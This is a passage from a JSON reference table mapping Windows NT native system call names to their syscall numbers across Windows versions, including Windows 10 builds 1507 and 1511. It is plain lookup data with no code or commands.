"NtYieldExecution": "69", "NtAddAtom": "70", "NtCreateEvent": "71", "NtQueryVolumeInformationFile": "72", "NtCreateSection": "73", "NtFlushBuffersFile": "74", "NtApphelpCacheControl": "75", "NtCreateProcessEx": "76", "NtCreateThread": "77", "NtIsProcessInJob": "78", "NtProtectVirtualMemory": "79", "NtQuerySection": "80", "NtResumeThread": "81", "NtTerminateThread": "82", "NtReadRequestData": "83", "NtCreateFile": "84", "NtQueryEvent": "85", "NtWriteRequestData": "86", "NtOpenDirectoryObject": "87", "NtAccessCheckByTypeAndAuditAlarm": "88", "NtQuerySystemTime": "89", "NtWaitForMultipleObjects": "90", "NtSetInformationObject": "91", "NtCancelIoFile": "92", "NtTraceEvent": "93", "NtPowerInformation": "94", "NtSetValueKey": "95", "NtCancelTimer": "96", "NtSetTimer": "97", "NtAccessCheck": "98", "NtAccessCheckByType": "99", "NtAccessCheckByTypeResultList": "100", "NtAccessCheckByTypeResultListAndAuditAlarm": "101", "NtAccessCheckByTypeResultListAndAuditAlarmByHandle": "102", "NtAddAtomEx": "103", "NtAddBootEntry": "104", "NtAddDriverEntry": "105", "NtAdjustGroupsToken": "106", "NtAdjustTokenClaimsAndDeviceGroups": "107", "NtAlertResumeThread": "108", "NtAlertThread": "109", "NtAlertThreadByThreadId": "110", "NtAllocateLocallyUniqueId": "111", "NtAllocateReserveObject": "112", "NtAllocateUserPhysicalPages": "113", "NtAllocateUuids": "114", "NtAlpcAcceptConnectPort": "115", "NtAlpcCancelMessage": "116", "NtAlpcConnectPort": "117", "NtAlpcConnectPortEx": "118", "NtAlpcCreatePort": "119", "NtAlpcCreatePortSection": "120", "NtAlpcCreateResourceReserve": "121", "NtAlpcCreateSectionView": "122", "NtAlpcCreateSecurityContext": "123", "NtAlpcDeletePortSection": "124", "NtAlpcDeleteResourceReserve": "125", "NtAlpcDeleteSectionView": "126", "NtAlpcDeleteSecurityContext": "127", "NtAlpcDisconnectPort": "128", "NtAlpcImpersonateClientOfPort": "129", "NtAlpcOpenSenderProcess": "130", "NtAlpcOpenSenderThread": "131", "NtAlpcQueryInformation": "132", "NtAlpcQueryInformationMessage": "133", "NtAlpcRevokeSecurityContext": "134", "NtAlpcSendWaitReceivePort": "135", "NtAlpcSetInformation": "136", "NtAreMappedFilesTheSame": "137", "NtAssignProcessToJobObject": "138", "NtAssociateWaitCompletionPacket": "139", "NtCancelIoFileEx": "140", "NtCancelSynchronousIoFile": "141", "NtCancelTimer2": "142", "NtCancelWaitCompletionPacket": "143", "NtCommitComplete": "144", "NtCommitEnlistment": "145", "NtCommitTransaction": "146", "NtCompactKeys": "147", "NtCompareTokens": "148", "NtCompleteConnectPort": "149", "NtCompressKey": "150", "NtConnectPort": "151", "NtCreateDebugObject": "152", "NtCreateDirectoryObject": "153", "NtCreateDirectoryObjectEx": "154", "NtCreateEnlistment": "155", "NtCreateEventPair": "156", "NtCreateIRTimer": "157", "NtCreateIoCompletion": "158", "NtCreateJobObject": "159", "NtCreateJobSet": "160", "NtCreateKeyTransacted": "161", "NtCreateKeyedEvent": "162", "NtCreateLowBoxToken": "163", "NtCreateMailslotFile": "164", "NtCreateMutant": "165", "NtCreateNamedPipeFile": "166", "NtCreatePagingFile": "167", "NtCreatePort": "168", "NtCreatePrivateNamespace": "169", "NtCreateProcess": "170", "NtCreateProfile": "171", "NtCreateProfileEx": "172", "NtCreateResourceManager": "173", "NtCreateSemaphore": "174", "NtCreateSymbolicLinkObject": "175", "NtCreateThreadEx": "176", "NtCreateTimer": "177", "NtCreateTimer2": "178", "NtCreateToken": "179", "NtCreateTokenEx": "180", "NtCreateTransaction": "181", "NtCreateTransactionManager": "182", "NtCreateUserProcess": "183", "NtCreateWaitCompletionPacket": "184", "NtCreateWaitablePort": "185", "NtCreateWnfStateName": "186", "NtCreateWorkerFactory": "187", "NtDebugActiveProcess": "188", "NtDebugContinue": "189", "NtDeleteAtom": "190", "NtDeleteBootEntry": "191", "NtDeleteDriverEntry": "192", "NtDeleteFile": "193", "NtDeleteKey": "194", "NtDeleteObjectAuditAlarm": "195", "NtDeletePrivateNamespace": "196", "NtDeleteValueKey": "197", "NtDeleteWnfStateData": "198", "NtDeleteWnfStateName": "199", "NtDisableLastKnownGood": "200", "NtDisplayString": "201", "NtDrawText": "202", "NtEnableLastKnownGood": "203", "NtEnumerateBootEntries": "204", "NtEnumerateDriverEntries": "205", "NtEnumerateSystemEnvironmentValuesEx": "206", "NtEnumerateTransactionObject": "207", "NtExtendSection": "208", "NtFilterBootOption": "209", "NtFilterToken": "210", "NtFilterTokenEx": "211", "NtFlushBuffersFileEx": "212", "NtFlushInstallUILanguage": "213", "NtFlushInstructionCache": "214", "NtFlushKey": "215", "NtFlushProcessWriteBuffers": "216", "NtFlushVirtualMemory": "217", "NtFlushWriteBuffer": "218", "NtFreeUserPhysicalPages": "219", "NtFreezeRegistry": "220", "NtFreezeTransactions": "221", "NtGetCachedSigningLevel": "222", "NtGetCompleteWnfStateSubscription": "223", "NtGetContextThread": "224", "NtGetCurrentProcessorNumber": "225", "NtGetDevicePowerState": "226", "NtGetMUIRegistryInfo": "227", "NtGetNextProcess": "228", "NtGetNextThread": "229", "NtGetNlsSectionPtr": "230", "NtGetNotificationResourceManager": "231", "NtGetWriteWatch": "232", "NtImpersonateAnonymousToken": "233", "NtImpersonateThread": "234", "NtInitializeNlsFiles": "235", "NtInitializeRegistry": "236", "NtInitiatePowerAction": "237", "NtIsSystemResumeAutomatic": "238", "NtIsUILanguageComitted": "239", "NtListenPort": "240", "NtLoadDriver": "241", "NtLoadKey": "242", "NtLoadKey2": "243", "NtLoadKeyEx": "244", "NtLockFile": "245", "NtLockProductActivationKeys": "246", "NtLockRegistryKey": "247", "NtLockVirtualMemory": "248", "NtMakePermanentObject": "249", "NtMakeTemporaryObject": "250", "NtMapCMFModule": "251", "NtMapUserPhysicalPages": "252", "NtModifyBootEntry": "253", "NtModifyDriverEntry": "254", "NtNotifyChangeDirectoryFile": "255", "NtNotifyChangeKey": "256", "NtNotifyChangeMultipleKeys": "257", "NtNotifyChangeSession": "258", "NtOpenEnlistment": "259", "NtOpenEventPair": "260", "NtOpenIoCompletion": "261", "NtOpenJobObject": "262", "NtOpenKeyEx": "263", "NtOpenKeyTransacted": "264", "NtOpenKeyTransactedEx": "265", "NtOpenKeyedEvent": "266", "NtOpenMutant": "267", "NtOpenObjectAuditAlarm": "268", "NtOpenPrivateNamespace": "269", "NtOpenProcessToken": "270", "NtOpenResourceManager": "271", "NtOpenSemaphore": "272", "NtOpenSession": "273", "NtOpenSymbolicLinkObject": "274", "NtOpenThread": "275", "NtOpenTimer": "276", "NtOpenTransaction": "277", "NtOpenTransactionManager": "278", "NtPlugPlayControl": "279", "NtPrePrepareComplete": "280", "NtPrePrepareEnlistment": "281", "NtPrepareComplete": "282", "NtPrepareEnlistment": "283", "NtPrivilegeCheck": "284", "NtPrivilegeObjectAuditAlarm": "285", "NtPrivilegedServiceAuditAlarm": "286", "NtPropagationComplete": "287", "NtPropagationFailed": "288", "NtPulseEvent": "289", "NtQueryBootEntryOrder": "290", "NtQueryBootOptions": "291", "NtQueryDebugFilterState": "292", "NtQueryDirectoryObject": "293", "NtQueryDriverEntryOrder": "294", "NtQueryEaFile": "295", "NtQueryFullAttributesFile": "296", "NtQueryInformationAtom": "297", "NtQueryInformationEnlistment": "298", "NtQueryInformationJobObject": "299", "NtQueryInformationPort": "300", "NtQueryInformationResourceManager": "301", "NtQueryInformationTransaction": "302", "NtQueryInformationTransactionManager": "303", "NtQueryInformationWorkerFactory": "304", "NtQueryInstallUILanguage": "305", "NtQueryIntervalProfile": "306", "NtQueryIoCompletion": "307", "NtQueryLicenseValue": "308", "NtQueryMultipleValueKey": "309", "NtQueryMutant": "310", "NtQueryOpenSubKeys": "311", "NtQueryOpenSubKeysEx": "312", "NtQueryPortInformationProcess": "313", "NtQueryQuotaInformationFile": "314", "NtQuerySecurityAttributesToken": "315", "NtQuerySecurityObject": "316", "NtQuerySemaphore": "317", "NtQuerySymbolicLinkObject": "318", "NtQuerySystemEnvironmentValue": "319", "NtQuerySystemEnvironmentValueEx": "320", "NtQuerySystemInformationEx": "321", "NtQueryTimerResolution": "322", "NtQueryWnfStateData": "323", "NtQueryWnfStateNameInformation": "324", "NtQueueApcThreadEx": "325", "NtRaiseException": "326", "NtRaiseHardError": "327", "NtReadOnlyEnlistment": "328", "NtRecoverEnlistment": "329", "NtRecoverResourceManager": "330", "NtRecoverTransactionManager": "331", "NtRegisterProtocolAddressInformation": "332", "NtRegisterThreadTerminatePort": "333", "NtReleaseKeyedEvent": "334", "NtReleaseWorkerFactoryWorker": "335", "NtRemoveIoCompletionEx": "336", "NtRemoveProcessDebug": "337", "NtRenameKey": "338", "NtRenameTransactionManager": "339", "NtReplaceKey": "340", "NtReplacePartitionUnit": "341", "NtReplyWaitReplyPort": "342", "NtRequestPort": "343", "NtResetEvent": "344", "NtResetWriteWatch": "345", "NtRestoreKey": "346", "NtResumeProcess": "347", "NtRollbackComplete": "348", "NtRollbackEnlistment": "349", "NtRollbackTransaction": "350", "NtRollforwardTransactionManager": "351", "NtSaveKey": "352", "NtSaveKeyEx": "353", "NtSaveMergedKeys": "354", "NtSecureConnectPort": "355", "NtSerializeBoot": "356", "NtSetBootEntryOrder": "357", "NtSetBootOptions": "358", "NtSetCachedSigningLevel": "359", "NtSetContextThread": "360", "NtSetDebugFilterState": "361", "NtSetDefaultHardErrorPort": "362", "NtSetDefaultLocale": "363", "NtSetDefaultUILanguage": "364", "NtSetDriverEntryOrder": "365", "NtSetEaFile": "366", "NtSetHighEventPair": "367", "NtSetHighWaitLowEventPair": "368", "NtSetIRTimer": "369", "NtSetInformationDebugObject": "370", "NtSetInformationEnlistment": "371", "NtSetInformationJobObject": "372", "NtSetInformationKey": "373", "NtSetInformationResourceManager": "374", "NtSetInformationToken": "375", "NtSetInformationTransaction": "376", "NtSetInformationTransactionManager": "377", "NtSetInformationVirtualMemory": "378", "NtSetInformationWorkerFactory": "379", "NtSetIntervalProfile": "380", "NtSetIoCompletion": "381", "NtSetIoCompletionEx": "382", "NtSetLdtEntries": "383", "NtSetLowEventPair": "384", "NtSetLowWaitHighEventPair": "385", "NtSetQuotaInformationFile": "386", "NtSetSecurityObject": "387", "NtSetSystemEnvironmentValue": "388", "NtSetSystemEnvironmentValueEx": "389", "NtSetSystemInformation": "390", "NtSetSystemPowerState": "391", "NtSetSystemTime": "392", "NtSetThreadExecutionState": "393", "NtSetTimer2": "394", "NtSetTimerEx": "395", "NtSetTimerResolution": "396", "NtSetUuidSeed": "397", "NtSetVolumeInformationFile": "398", "NtSetWnfProcessNotificationEvent": "399", "NtShutdownSystem": "400", "NtShutdownWorkerFactory": "401", "NtSignalAndWaitForSingleObject": "402", "NtSinglePhaseReject": "403", "NtStartProfile": "404", "NtStopProfile": "405", "NtSubscribeWnfStateChange": "406", "NtSuspendProcess": "407", "NtSuspendThread": "408", "NtSystemDebugControl": "409", "NtTerminateJobObject": "410", "NtTestAlert": "411", "NtThawRegistry": "412", "NtThawTransactions": "413", "NtTraceControl": "414", "NtTranslateFilePath": "415", "NtUmsThreadYield": "416", "NtUnloadDriver": "417", "NtUnloadKey": "418", "NtUnloadKey2": "419", "NtUnloadKeyEx": "420", "NtUnlockFile": "421", "NtUnlockVirtualMemory": "422", "NtUnmapViewOfSectionEx": "423", "NtUnsubscribeWnfStateChange": "424", "NtUpdateWnfStateData": "425", "NtVdmControl": "426", "NtWaitForAlertByThreadId": "427", "NtWaitForDebugEvent": "428", "NtWaitForKeyedEvent": "429", "NtWaitForWorkViaWorkerFactory": "430", "NtWaitHighEventPair": "431", "NtWaitLowEventPair": "432"}}, "Windows 10": {"1507": {"NtAccessCheck": "0", "NtWorkerFactoryWorkerReady": "1", "NtAcceptConnectPort": "2", "NtMapUserPhysicalPagesScatter": "3", "NtWaitForSingleObject": "4", "NtCallbackReturn": "5", "NtReadFile": "6", "NtDeviceIoControlFile": "7", "NtWriteFile": "8", "NtRemoveIoCompletion": "9", "NtReleaseSemaphore": "10", "NtReplyWaitReceivePort": "11", "NtReplyPort": "12", "NtSetInformationThread": "13", "NtSetEvent": "14", "NtClose": "15", "NtQueryObject": "16", "NtQueryInformationFile": "17", "NtOpenKey": "18", "NtEnumerateValueKey": "19", "NtFindAtom": "20", "NtQueryDefaultLocale": "21", "NtQueryKey": "22", "NtQueryValueKey": "23", "NtAllocateVirtualMemory": "24", "NtQueryInformationProcess": "25", "NtWaitForMultipleObjects32": "26", "NtWriteFileGather": "27", "NtSetInformationProcess": "28", "NtCreateKey": "29", "NtFreeVirtualMemory": "30", "NtImpersonateClientOfPort": "31", "NtReleaseMutant": "32", "NtQueryInformationToken": "33", "NtRequestWaitReplyPort": "34", "NtQueryVirtualMemory": "35", "NtOpenThreadToken": "36", "NtQueryInformationThread": "37", "NtOpenProcess": "38", "NtSetInformationFile": "39", "NtMapViewOfSection": "40", "NtAccessCheckAndAuditAlarm": "41", "NtUnmapViewOfSection": "42", "NtReplyWaitReceivePortEx": "43", "NtTerminateProcess": "44", "NtSetEventBoostPriority": "45", "NtReadFileScatter": "46", "NtOpenThreadTokenEx": "47", "NtOpenProcessTokenEx": "48", "NtQueryPerformanceCounter": "49", "NtEnumerateKey": "50", "NtOpenFile": "51", "NtDelayExecution": "52", "NtQueryDirectoryFile": "53", "NtQuerySystemInformation": "54", "NtOpenSection": "55", "NtQueryTimer": "56", "NtFsControlFile": "57", "NtWriteVirtualMemory": "58", "NtCloseObjectAuditAlarm": "59", "NtDuplicateObject": "60", "NtQueryAttributesFile": "61", "NtClearEvent": "62", "NtReadVirtualMemory": "63", "NtOpenEvent": "64", "NtAdjustPrivilegesToken": "65", "NtDuplicateToken": "66", "NtContinue": "67", "NtQueryDefaultUILanguage": "68", "NtQueueApcThread": "69", "NtYieldExecution": "70", "NtAddAtom": "71", "NtCreateEvent": "72", "NtQueryVolumeInformationFile": "73", "NtCreateSection": "74", "NtFlushBuffersFile": "75", "NtApphelpCacheControl": "76", "NtCreateProcessEx": "77", "NtCreateThread": "78", "NtIsProcessInJob": "79", "NtProtectVirtualMemory": "80", "NtQuerySection": "81", "NtResumeThread": "82", "NtTerminateThread": "83", "NtReadRequestData": "84", "NtCreateFile": "85", "NtQueryEvent": "86", "NtWriteRequestData": "87", "NtOpenDirectoryObject": "88", "NtAccessCheckByTypeAndAuditAlarm": "89", "NtQuerySystemTime": "90", "NtWaitForMultipleObjects": "91", "NtSetInformationObject": "92", "NtCancelIoFile": "93", "NtTraceEvent": "94", "NtPowerInformation": "95", "NtSetValueKey": "96", "NtCancelTimer": "97", "NtSetTimer": "98", "NtAccessCheckByType": "99", "NtAccessCheckByTypeResultList": "100", "NtAccessCheckByTypeResultListAndAuditAlarm": "101", "NtAccessCheckByTypeResultListAndAuditAlarmByHandle": "102", "NtAddAtomEx": "103", "NtAddBootEntry": "104", "NtAddDriverEntry": "105", "NtAdjustGroupsToken": "106", "NtAdjustTokenClaimsAndDeviceGroups": "107", "NtAlertResumeThread": "108", "NtAlertThread": "109", "NtAlertThreadByThreadId": "110", "NtAllocateLocallyUniqueId": "111", "NtAllocateReserveObject": "112", "NtAllocateUserPhysicalPages": "113", "NtAllocateUuids": "114", "NtAlpcAcceptConnectPort": "115", "NtAlpcCancelMessage": "116", "NtAlpcConnectPort": "117", "NtAlpcConnectPortEx": "118", "NtAlpcCreatePort": "119", "NtAlpcCreatePortSection": "120", "NtAlpcCreateResourceReserve": "121", "NtAlpcCreateSectionView": "122", "NtAlpcCreateSecurityContext": "123", "NtAlpcDeletePortSection": "124", "NtAlpcDeleteResourceReserve": "125", "NtAlpcDeleteSectionView": "126", "NtAlpcDeleteSecurityContext": "127", "NtAlpcDisconnectPort": "128", "NtAlpcImpersonateClientContainerOfPort": "129", "NtAlpcImpersonateClientOfPort": "130", "NtAlpcOpenSenderProcess": "131", "NtAlpcOpenSenderThread": "132", "NtAlpcQueryInformation": "133", "NtAlpcQueryInformationMessage": "134", "NtAlpcRevokeSecurityContext": "135", "NtAlpcSendWaitReceivePort": "136", "NtAlpcSetInformation": "137", "NtAreMappedFilesTheSame": "138", "NtAssignProcessToJobObject": "139", "NtAssociateWaitCompletionPacket": "140", "NtCancelIoFileEx": "141", "NtCancelSynchronousIoFile": "142", "NtCancelTimer2": "143", "NtCancelWaitCompletionPacket": "144", "NtCommitComplete": "145", "NtCommitEnlistment": "146", "NtCommitTransaction": "147", "NtCompactKeys": "148", "NtCompareObjects": "149", "NtCompareTokens": "150", "NtCompleteConnectPort": "151", "NtCompressKey": "152", "NtConnectPort": "153", "NtCreateDebugObject": "154", "NtCreateDirectoryObject": "155", "NtCreateDirectoryObjectEx": "156", "NtCreateEnlistment": "157", "NtCreateEventPair": "158", "NtCreateIRTimer": "159", "NtCreateIoCompletion": "160", "NtCreateJobObject": "161", "NtCreateJobSet": "162", "NtCreateKeyTransacted": "163", "NtCreateKeyedEvent": "164", "NtCreateLowBoxToken": "165", "NtCreateMailslotFile": "166", "NtCreateMutant": "167", "NtCreateNamedPipeFile": "168", "NtCreatePagingFile": "169", "NtCreatePartition": "170", "NtCreatePort": "171", "NtCreatePrivateNamespace": "172", "NtCreateProcess": "173", "NtCreateProfile": "174", "NtCreateProfileEx": "175", "NtCreateResourceManager": "176", "NtCreateSemaphore": "177", "NtCreateSymbolicLinkObject": "178", "NtCreateThreadEx": "179", "NtCreateTimer": "180", "NtCreateTimer2": "181", "NtCreateToken": "182", "NtCreateTokenEx": "183", "NtCreateTransaction": "184", "NtCreateTransactionManager": "185", "NtCreateUserProcess": "186", "NtCreateWaitCompletionPacket": "187", "NtCreateWaitablePort": "188", "NtCreateWnfStateName": "189", "NtCreateWorkerFactory": "190", "NtDebugActiveProcess": "191", "NtDebugContinue": "192", "NtDeleteAtom": "193", "NtDeleteBootEntry": "194", "NtDeleteDriverEntry": "195", "NtDeleteFile": "196", "NtDeleteKey": "197", "NtDeleteObjectAuditAlarm": "198", "NtDeletePrivateNamespace": "199", "NtDeleteValueKey": "200", "NtDeleteWnfStateData": "201", "NtDeleteWnfStateName": "202", "NtDisableLastKnownGood": "203", "NtDisplayString": "204", "NtDrawText": "205", "NtEnableLastKnownGood": "206", "NtEnumerateBootEntries": "207", "NtEnumerateDriverEntries": "208", "NtEnumerateSystemEnvironmentValuesEx": "209", "NtEnumerateTransactionObject": "210", "NtExtendSection": "211", "NtFilterBootOption": "212", "NtFilterToken": "213", "NtFilterTokenEx": "214", "NtFlushBuffersFileEx": "215", "NtFlushInstallUILanguage": "216", "NtFlushInstructionCache": "217", "NtFlushKey": "218", "NtFlushProcessWriteBuffers": "219", "NtFlushVirtualMemory": "220", "NtFlushWriteBuffer": "221", "NtFreeUserPhysicalPages": "222", "NtFreezeRegistry": "223", "NtFreezeTransactions": "224", "NtGetCachedSigningLevel": "225", "NtGetCompleteWnfStateSubscription": "226", "NtGetContextThread": "227", "NtGetCurrentProcessorNumber": "228", "NtGetCurrentProcessorNumberEx": "229", "NtGetDevicePowerState": "230", "NtGetMUIRegistryInfo": "231", "NtGetNextProcess": "232", "NtGetNextThread": "233", "NtGetNlsSectionPtr": "234", "NtGetNotificationResourceManager": "235", "NtGetWriteWatch": "236", "NtImpersonateAnonymousToken": "237", "NtImpersonateThread": "238", "NtInitializeNlsFiles": "239", "NtInitializeRegistry": "240", "NtInitiatePowerAction": "241", "NtIsSystemResumeAutomatic": "242", "NtIsUILanguageComitted": "243", "NtListenPort": "244", "NtLoadDriver": "245", "NtLoadKey": "246", "NtLoadKey2": "247", "NtLoadKeyEx": "248", "NtLockFile": "249", "NtLockProductActivationKeys": "250", "NtLockRegistryKey": "251", "NtLockVirtualMemory": "252", "NtMakePermanentObject": "253", "NtMakeTemporaryObject": "254", "NtManagePartition": "255", "NtMapCMFModule": "256", "NtMapUserPhysicalPages": "257", "NtModifyBootEntry": "258", "NtModifyDriverEntry": "259", "NtNotifyChangeDirectoryFile": "260", "NtNotifyChangeKey": "261", "NtNotifyChangeMultipleKeys": "262", "NtNotifyChangeSession": "263", "NtOpenEnlistment": "264", "NtOpenEventPair": "265", "NtOpenIoCompletion": "266", "NtOpenJobObject": "267", "NtOpenKeyEx": "268", "NtOpenKeyTransacted": "269", "NtOpenKeyTransactedEx": "270", "NtOpenKeyedEvent": "271", "NtOpenMutant": "272", "NtOpenObjectAuditAlarm": "273", "NtOpenPartition": "274", "NtOpenPrivateNamespace": "275", "NtOpenProcessToken": "276", "NtOpenResourceManager": "277", "NtOpenSemaphore": "278", "NtOpenSession": "279", "NtOpenSymbolicLinkObject": "280", "NtOpenThread": "281", "NtOpenTimer": "282", "NtOpenTransaction": "283", "NtOpenTransactionManager": "284", "NtPlugPlayControl": "285", "NtPrePrepareComplete": "286", "NtPrePrepareEnlistment": "287", "NtPrepareComplete": "288", "NtPrepareEnlistment": "289", "NtPrivilegeCheck": "290", "NtPrivilegeObjectAuditAlarm": "291", "NtPrivilegedServiceAuditAlarm": "292", "NtPropagationComplete": "293", "NtPropagationFailed": "294", "NtPulseEvent": "295", "NtQueryBootEntryOrder": "296", "NtQueryBootOptions": "297", "NtQueryDebugFilterState": "298", "NtQueryDirectoryObject": "299", "NtQueryDriverEntryOrder": "300", "NtQueryEaFile": "301", "NtQueryFullAttributesFile": "302", "NtQueryInformationAtom": "303", "NtQueryInformationEnlistment": "304", "NtQueryInformationJobObject": "305", "NtQueryInformationPort": "306", "NtQueryInformationResourceManager": "307", "NtQueryInformationTransaction": "308", "NtQueryInformationTransactionManager": "309", "NtQueryInformationWorkerFactory": "310", "NtQueryInstallUILanguage": "311", "NtQueryIntervalProfile": "312", "NtQueryIoCompletion": "313", "NtQueryLicenseValue": "314", "NtQueryMultipleValueKey": "315", "NtQueryMutant": "316", "NtQueryOpenSubKeys": "317", "NtQueryOpenSubKeysEx": "318", "NtQueryPortInformationProcess": "319", "NtQueryQuotaInformationFile": "320", "NtQuerySecurityAttributesToken": "321", "NtQuerySecurityObject": "322", "NtQuerySemaphore": "323", "NtQuerySymbolicLinkObject": "324", "NtQuerySystemEnvironmentValue": "325", "NtQuerySystemEnvironmentValueEx": "326", "NtQuerySystemInformationEx": "327", "NtQueryTimerResolution": "328", "NtQueryWnfStateData": "329", "NtQueryWnfStateNameInformation": "330", "NtQueueApcThreadEx": "331", "NtRaiseException": "332", "NtRaiseHardError": "333", "NtReadOnlyEnlistment": "334", "NtRecoverEnlistment": "335", "NtRecoverResourceManager": "336", "NtRecoverTransactionManager": "337", "NtRegisterProtocolAddressInformation": "338", "NtRegisterThreadTerminatePort": "339", "NtReleaseKeyedEvent": "340", "NtReleaseWorkerFactoryWorker": "341", "NtRemoveIoCompletionEx": "342", "NtRemoveProcessDebug": "343", "NtRenameKey": "344", "NtRenameTransactionManager": "345", "NtReplaceKey": "346", "NtReplacePartitionUnit": "347", "NtReplyWaitReplyPort": "348", "NtRequestPort": "349", "NtResetEvent": "350", "NtResetWriteWatch": "351", "NtRestoreKey": "352", "NtResumeProcess": "353", "NtRevertContainerImpersonation": "354", "NtRollbackComplete": "355", "NtRollbackEnlistment": "356", "NtRollbackTransaction": "357", "NtRollforwardTransactionManager": "358", "NtSaveKey": "359", "NtSaveKeyEx": "360", "NtSaveMergedKeys": "361", "NtSecureConnectPort": "362", "NtSerializeBoot": "363", "NtSetBootEntryOrder": "364", "NtSetBootOptions": "365", "NtSetCachedSigningLevel": "366", "NtSetContextThread": "367", "NtSetDebugFilterState": "368", "NtSetDefaultHardErrorPort": "369", "NtSetDefaultLocale": "370", "NtSetDefaultUILanguage": "371", "NtSetDriverEntryOrder": "372", "NtSetEaFile": "373", "NtSetHighEventPair": "374", "NtSetHighWaitLowEventPair": "375", "NtSetIRTimer": "376", "NtSetInformationDebugObject": "377", "NtSetInformationEnlistment": "378", "NtSetInformationJobObject": "379", "NtSetInformationKey": "380", "NtSetInformationResourceManager": "381", "NtSetInformationSymbolicLink": "382", "NtSetInformationToken": "383", "NtSetInformationTransaction": "384", "NtSetInformationTransactionManager": "385", "NtSetInformationVirtualMemory": "386", "NtSetInformationWorkerFactory": "387", "NtSetIntervalProfile": "388", "NtSetIoCompletion": "389", "NtSetIoCompletionEx": "390", "NtSetLdtEntries": "391", "NtSetLowEventPair": "392", "NtSetLowWaitHighEventPair": "393", "NtSetQuotaInformationFile": "394", "NtSetSecurityObject": "395", "NtSetSystemEnvironmentValue": "396", "NtSetSystemEnvironmentValueEx": "397", "NtSetSystemInformation": "398", "NtSetSystemPowerState": "399", "NtSetSystemTime": "400", "NtSetThreadExecutionState": "401", "NtSetTimer2": "402", "NtSetTimerEx": "403", "NtSetTimerResolution": "404", "NtSetUuidSeed": "405", "NtSetVolumeInformationFile": "406", "NtSetWnfProcessNotificationEvent": "407", "NtShutdownSystem": "408", "NtShutdownWorkerFactory": "409", "NtSignalAndWaitForSingleObject": "410", "NtSinglePhaseReject": "411", "NtStartProfile": "412", "NtStopProfile": "413", "NtSubscribeWnfStateChange": "414", "NtSuspendProcess": "415", "NtSuspendThread": "416", "NtSystemDebugControl": "417", "NtTerminateJobObject": "418", "NtTestAlert": "419", "NtThawRegistry": "420", "NtThawTransactions": "421", "NtTraceControl": "422", "NtTranslateFilePath": "423", "NtUmsThreadYield": "424", "NtUnloadDriver": "425", "NtUnloadKey": "426", "NtUnloadKey2": "427", "NtUnloadKeyEx": "428", "NtUnlockFile": "429", "NtUnlockVirtualMemory": "430", "NtUnmapViewOfSectionEx": "431", "NtUnsubscribeWnfStateChange": "432", "NtUpdateWnfStateData": "433", "NtVdmControl": "434", "NtWaitForAlertByThreadId": "435", "NtWaitForDebugEvent": "436", "NtWaitForKeyedEvent": "437", "NtWaitForWorkViaWorkerFactory": "438", "NtWaitHighEventPair": "439", "NtWaitLowEventPair": "440"}, "1511": {"NtAccessCheck": "0", "NtWorkerFactoryWorkerReady": "1", "NtAcceptConnectPort": "2", "NtMapUserPhysicalPagesScatter": "3", "NtWaitForSingleObject": "4", "NtCallbackReturn": "5", "NtReadFile": "6", "NtDeviceIoControlFile": "7", "NtWriteFile": "8", "NtRemoveIoCompletion": "9", "NtReleaseSemaphore": "10", "NtReplyWaitReceivePort": "11", "NtReplyPort": "12", "NtSetInformationThread": "13", "NtSetEvent": "14", "NtClose": "15", "NtQueryObject": "16", "NtQueryInformationFile": "17", "NtOpenKey": "18", "NtEnumerateValueKey": "19", "NtFindAtom": "20", "NtQueryDefaultLocale": "21", "NtQueryKey": "22", "NtQueryValueKey": "23", "NtAllocateVirtualMemory": "24", "NtQueryInformationProcess": "25", "NtWaitForMultipleObjects32": "26", "NtWriteFileGather": "27", "NtSetInformationProcess": "28", "NtCreateKey": "29", "NtFreeVirtualMemory": "30", "NtImpersonateClientOfPort": "31", "NtReleaseMutant": "32", "NtQueryInformationToken": "33", "NtRequestWaitReplyPort": "34", "NtQueryVirtualMemory": "35", "NtOpenThreadToken": "36", "NtQueryInformationThread": "37", "NtOpenProcess": "38", "NtSetInformationFile": "39", "NtMapViewOfSection": "40", "NtAccessCheckAndAuditAlarm": "41", "NtUnmapViewOfSection": "42", "NtReplyWaitReceivePortEx": "43", "NtTerminateProcess": "44", "NtSetEventBoostPriority": "45", "NtReadFileScatter": "46", "NtOpenThreadTokenEx": "47", "NtOpenProcessTokenEx": "48", "NtQueryPerformanceCounter": "49", "NtEnumerateKey": "50", "NtOpenFile": "51", "NtDelayExecution": "52", "NtQueryDirectoryFile": "53", "NtQuerySystemInformation": "54", "NtOpenSection": "55", "NtQueryTimer": "56", "NtFsControlFile": "57", "NtWriteVirtualMemory": "58", "NtCloseObjectAuditAlarm": "59", "NtDuplicateObject": "60", "NtQueryAttributesFile": "61", "NtClearEvent": "62", "NtReadVirtualMemory": "63", "NtOpenEvent": "64", "NtAdjustPrivilegesToken": "65", "NtDuplicateToken": "66", "NtContinue": "67", "NtQueryDefaultUILanguage": "68", "NtQueueApcThread": "69", "NtYieldExecution": "70", "NtAddAtom": "71", "NtCreateEvent": "72", "NtQueryVolumeInformationFile": "73", "NtCreateSection": "74", "NtFlushBuffersFile": "75", "NtApphelpCacheControl": "76", "NtCreateProcessEx": "77", "NtCreateThread": "78", "NtIsProcessInJob": "79", "NtProtectVirtualMemory": "80", "NtQuerySection": "81", "NtResumeThread": "82", "NtTerminateThread": "83", "NtReadRequestData": "84", "NtCreateFile": "85", "NtQueryEvent": "86", "NtWriteRequestData": "87", "NtOpenDirectoryObject": "88", "NtAccessCheckByTypeAndAuditAlarm": "89", "NtQuerySystemTime": "90", "NtWaitForMultipleObjects": "91", "NtSetInformationObject": "92", "NtCancelIoFile": "93", "NtTraceEvent": "94", "NtPowerInformation": "95", "NtSetValueKey": "96", "NtCancelTimer": "97", "NtSetTimer": "98", "NtAccessCheckByType": "99", "NtAccessCheckByTypeResultList": "100", "NtAccessCheckByTypeResultListAndAuditAlarm": "101", "NtAccessCheckByTypeResultListAndAuditAlarmByHandle": "102", "NtAddAtomEx": "103", "NtAddBootEntry": "104", "NtAddDriverEntry": "105", "NtAdjustGroupsToken": "106", "NtAdjustTokenClaimsAndDeviceGroups": "107", "NtAlertResumeThread": "108", "NtAlertThread": "109", "NtAlertThreadByThreadId": "110", "NtAllocateLocallyUniqueId": "111", "NtAllocateReserveObject": "112", "NtAllocateUserPhysicalPages": "113", "NtAllocateUuids": "114", "NtAlpcAcceptConnectPort": "115", "NtAlpcCancelMessage": "116", "NtAlpcConnectPort": "117", "NtAlpcConnectPortEx": "118", "NtAlpcCreatePort": "119", "NtAlpcCreatePortSection": "120", "NtAlpcCreateResourceReserve": "121", "NtAlpcCreateSectionView": "122", "NtAlpcCreateSecurityContext": "123", 